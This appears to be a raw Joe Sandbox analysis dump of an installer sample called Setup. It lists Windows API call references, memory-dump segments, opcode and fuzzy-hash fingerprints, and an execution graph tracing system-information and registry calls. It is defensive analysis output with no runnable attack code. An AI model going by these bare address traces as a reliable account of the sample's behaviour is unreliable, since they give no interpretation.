                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                              • String ID: Version
                                                                                                                                                                              • API String ID: 512980652-315105994
                                                                                                                                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                              APIs
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2883127279-0
                                                                                                                                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                              • String ID: !N~
                                                                                                                                                                              • API String ID: 623250636-529124213
                                                                                                                                                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                              Strings
                                                                                                                                                                              • Error launching installer, xrefs: 00405C74
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                              • API String ID: 3509786178-2769509956
                                                                                                                                                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3.2%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:3.5%
                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                              Total number of Limit Nodes:65
                                                                                                                                                                              execution_graph 102493 da105b 102498 da52a7 102493->102498 102495 da106a 102529 dc0413 29 API calls __onexit 102495->102529 102497 da1074 102499 da52b7 __wsopen_s 102498->102499 102530 dabf73 102499->102530 102503 da5376 102542 da5238 102503->102542 102510 dabf73 8 API calls 102511 da53a7 102510->102511 102563 dabd57 102511->102563 102514 de4be6 RegQueryValueExW 102515 de4c7c RegCloseKey 102514->102515 102516 de4c03 102514->102516 102518 da53d2 102515->102518 102521 de4c8e _wcslen 102515->102521 102569 dc017b 102516->102569 102518->102495 102519 de4c1c 102578 da423c 102519->102578 102521->102518 102526 da655e 8 API calls 102521->102526 102528 da6a7c 8 API calls 102521->102528 102593 dab329 102521->102593 102523 de4c44 102581 da8577 102523->102581 102525 de4c5e messages 102525->102515 102526->102521 102528->102521 102529->102497 102531 dc017b 8 API calls 102530->102531 102532 dabf88 102531->102532 102599 dc014b 102532->102599 102534 da536d 102535 da5594 102534->102535 102611 de22d0 102535->102611 102538 dab329 8 API calls 102539 da55c7 102538->102539 102613 da5851 102539->102613 102541 da55d1 102541->102503 102543 de22d0 __wsopen_s 102542->102543 102544 da5245 GetFullPathNameW 102543->102544 102545 da5267 102544->102545 102546 da8577 8 API calls 102545->102546 102547 da5285 102546->102547 102548 da6b7c 102547->102548 102549 de57fe 102548->102549 102550 da6b93 102548->102550 102551 dc014b 8 API calls 102549->102551 102637 da6ba4 102550->102637 102553 de5808 _wcslen 102551->102553 102555 dc017b 8 API calls 102553->102555 102554 da538f 102557 da6a7c 102554->102557 102556 de5841 __fread_nolock 102555->102556 102558 da6a8b 102557->102558 102562 da6aac __fread_nolock 102557->102562 102560 dc017b 8 API calls 102558->102560 102559 dc014b 8 API calls 102561 da539e 102559->102561 102560->102562 102561->102510 102562->102559 102564 dabd71 102563->102564 102568 da53b0 RegOpenKeyExW 102563->102568 102565 dc014b 8 API calls 102564->102565 102566 dabd7b 102565->102566 102567 dc017b 8 API calls 102566->102567 102567->102568 102568->102514 102568->102518 102570 dc014b ___std_exception_copy 102569->102570 102571 dc016a 102570->102571 102574 dc016c 102570->102574 102652 dc521d 7 API calls 2 library calls 102570->102652 102571->102519 102573 dc09dd 102654 dc3614 RaiseException 102573->102654 102574->102573 102653 dc3614 RaiseException 102574->102653 102577 dc09fa 102577->102519 102579 dc014b 8 API calls 102578->102579 102580 da424e RegQueryValueExW 102579->102580 102580->102523 102580->102525 102582 da8587 _wcslen 102581->102582 102583 de6610 102581->102583 102586 da859d 102582->102586 102587 da85c2 102582->102587 102584 daadf4 8 API calls 102583->102584 102585 de6619 102584->102585 102585->102585 102655 da88e8 8 API calls 102586->102655 102589 dc014b 8 API calls 102587->102589 102590 da85ce 102589->102590 102591 dc017b 8 API calls 102590->102591 102592 da85a5 __fread_nolock 102591->102592 102592->102525 102594 dab338 _wcslen 102593->102594 102595 dc017b 8 API calls 102594->102595 102596 dab360 __fread_nolock 102595->102596 102597 dc014b 8 API calls 102596->102597 102598 dab376 102597->102598 102598->102521 102601 dc0150 ___std_exception_copy 102599->102601 102600 dc016a 102600->102534 102601->102600 102604 dc016c 102601->102604 102608 dc521d 7 API calls 2 library calls 102601->102608 102603 dc09dd 102610 dc3614 RaiseException 102603->102610 102604->102603 102609 dc3614 RaiseException 102604->102609 102607 dc09fa 102607->102534 102608->102601 102609->102603 102610->102607 102612 da55a1 GetModuleFileNameW 102611->102612 102612->102538 102614 de22d0 __wsopen_s 102613->102614 102615 da585e GetFullPathNameW 102614->102615 102616 da5898 102615->102616 102617 da587d 102615->102617 102618 dabd57 8 API calls 102616->102618 102619 da8577 8 API calls 102617->102619 102620 da5889 102618->102620 102619->102620 102623 da55dc 102620->102623 102624 da55ea 102623->102624 102627 daadf4 102624->102627 102626 da55fe 102626->102541 102628 daae02 102627->102628 102630 daae0b __fread_nolock 102627->102630 102628->102630 102631 dac2c9 102628->102631 102630->102626 102632 dac2dc 102631->102632 102636 dac2d9 __fread_nolock 102631->102636 102633 dc014b 8 API calls 102632->102633 102634 dac2e7 102633->102634 102635 dc017b 8 API calls 102634->102635 102635->102636 102636->102630 102638 da6bb4 _wcslen 102637->102638 102639 da6bc7 102638->102639 102640 de5860 102638->102640 102647 da7d74 102639->102647 102642 dc014b 8 API calls 102640->102642 102643 de586a 102642->102643 102645 dc017b 8 API calls 102643->102645 102644 da6bd4 __fread_nolock 102644->102554 102646 de589a __fread_nolock 102645->102646 102649 da7d8a 102647->102649 102651 da7d85 __fread_nolock 102647->102651 102648 de6528 102649->102648 102650 dc017b 8 API calls 102649->102650 102650->102651 102651->102644 102652->102570 102653->102573 102654->102577 102655->102592 102656 da1098 102661 da5fc8 102656->102661 102660 da10a7 102662 dabf73 8 API calls 102661->102662 102663 da5fdf GetVersionExW 102662->102663 102664 da8577 8 API calls 102663->102664 102665 da602c 102664->102665 102666 daadf4 8 API calls 102665->102666 102680 da6062 102665->102680 102667 da6056 102666->102667 102669 da55dc 8 API calls 102667->102669 102668 da611c GetCurrentProcess IsWow64Process 102670 da6138 102668->102670 102669->102680 102671 de5269 GetSystemInfo 102670->102671 102672 da6150 LoadLibraryA 102670->102672 102673 da619d GetSystemInfo 102672->102673 102674 da6161 GetProcAddress 102672->102674 102675 da6177 102673->102675 102674->102673 102677 da6171 GetNativeSystemInfo 102674->102677 102678 da617b FreeLibrary 102675->102678 102679 da109d 102675->102679 102676 de5224 102677->102675 102678->102679 102681 dc0413 29 API calls __onexit 102679->102681 102680->102668 102680->102676 102681->102660 102682 db0ebf 102683 db0ed3 102682->102683 102688 db1425 102682->102688 102684 db0ee5 102683->102684 102685 dc014b 8 API calls 102683->102685 102686 df562c 102684->102686 102689 db0f3e 102684->102689 102786 dab4c8 102684->102786 102685->102684 102794 e11b14 8 API calls 102686->102794 102688->102684 102790 dabed9 102688->102790 102707 db049d messages 102689->102707 102725 db2b20 102689->102725 102693 df632b 102798 e13fe1 81 API calls __wsopen_s 102693->102798 102695 db1695 102703 dabed9 8 API calls 102695->102703 102695->102707 102696 dc014b 8 API calls 102714 db0376 messages 102696->102714 102698 df625a 102797 e13fe1 81 API calls __wsopen_s 102698->102797 102699 dabed9 8 API calls 102699->102714 102700 df5cdb 102705 dabed9 8 API calls 102700->102705 102700->102707 102703->102707 102705->102707 102706 dabf73 8 API calls 102706->102714 102708 dc05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102708->102714 102709 dc0413 29 API calls pre_c_initialization 102709->102714 102710 df6115 102795 e13fe1 81 API calls __wsopen_s 102710->102795 102712 db0aae messages 102796 e13fe1 81 API calls __wsopen_s 102712->102796 102713 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102713->102714 102714->102693 102714->102695 102714->102696 102714->102698 102714->102699 102714->102700 102714->102706 102714->102707 102714->102708 102714->102709 102714->102710 102714->102712 102714->102713 102715 db1e50 102714->102715 102785 db1990 207 API calls 2 library calls 102714->102785 102718 db1e6d messages 102715->102718 102716 db2512 102719 db1ff7 messages 102716->102719 102802 dbbe08 39 API calls 102716->102802 102718->102716 102718->102719 102721 df7837 102718->102721 102724 df766b 102718->102724 102800 dbe322 8 API calls messages 102718->102800 102719->102714 102721->102719 102801 dcd2d5 39 API calls 102721->102801 102799 dcd2d5 39 API calls 102724->102799 102726 db2b61 102725->102726 102727 db2fc0 102726->102727 102728 db2b86 102726->102728 102965 dc05b2 5 API calls __Init_thread_wait 102727->102965 102730 df7bd8 102728->102730 102731 db2ba0 102728->102731 102928 e27af9 102730->102928 102803 db3160 102731->102803 102733 db2fca 102738 dab329 8 API calls 102733->102738 102743 db300b 102733->102743 102735 df7be4 102735->102714 102737 db3160 9 API calls 102739 db2bc6 102737->102739 102746 db2fe4 102738->102746 102740 db2bfc 102739->102740 102739->102743 102742 df7bfd 102740->102742 102758 db2c18 __fread_nolock 102740->102758 102741 df7bed 102741->102714 102969 e13fe1 81 API calls __wsopen_s 102742->102969 102743->102741 102744 dab4c8 8 API calls 102743->102744 102747 db3049 102744->102747 102966 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102746->102966 102967 dbe6e8 207 API calls 102747->102967 102749 df7c15 102970 e13fe1 81 API calls __wsopen_s 102749->102970 102752 db3082 102968 dbfe39 8 API calls 102752->102968 102753 df7c78 102972 e261a2 53 API calls _wcslen 102753->102972 102754 db2d4c 102755 db3160 9 API calls 102754->102755 102759 db2d59 102755->102759 102757 dc014b 8 API calls 102757->102758 102758->102747 102758->102749 102758->102757 102760 dc017b 8 API calls 102758->102760 102766 db2d3f 102758->102766 102768 df7c59 102758->102768 102774 db2dd7 messages 102758->102774 102813 db0340 102758->102813 102762 db3160 9 API calls 102759->102762 102759->102774 102760->102758 102771 db2d73 102762->102771 102764 db2f2d 102764->102714 102766->102753 102766->102754 102971 e13fe1 81 API calls __wsopen_s 102768->102971 102769 db3160 9 API calls 102769->102774 102770 db2e8b messages 102770->102764 102964 dbe322 8 API calls messages 102770->102964 102773 dabed9 8 API calls 102771->102773 102771->102774 102773->102774 102774->102752 102774->102769 102774->102770 102836 e1f94a 102774->102836 102845 e20fb8 102774->102845 102870 e29ffc 102774->102870 102873 e1664c 102774->102873 102880 e2a5b2 102774->102880 102886 dbac3e 102774->102886 102905 e2ad47 102774->102905 102910 e2a6aa 102774->102910 102918 e21858 102774->102918 102925 e29fe8 102774->102925 102973 e13fe1 81 API calls __wsopen_s 102774->102973 102785->102714 102787 dab4dc 102786->102787 102788 dab4d6 102786->102788 102787->102684 102788->102787 102789 dabed9 8 API calls 102788->102789 102789->102787 102791 dabefc __fread_nolock 102790->102791 102792 dabeed 102790->102792 102791->102684 102792->102791 102793 dc017b 8 API calls 102792->102793 102793->102791 102794->102707 102795->102712 102796->102707 102797->102707 102798->102707 102799->102724 102800->102718 102801->102719 102802->102719 102804 db317d 102803->102804 102805 db31a1 102803->102805 102812 db2bb0 102804->102812 102976 dc05b2 5 API calls __Init_thread_wait 102804->102976 102974 dc05b2 5 API calls __Init_thread_wait 102805->102974 102807 db31ab 102807->102804 102975 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102807->102975 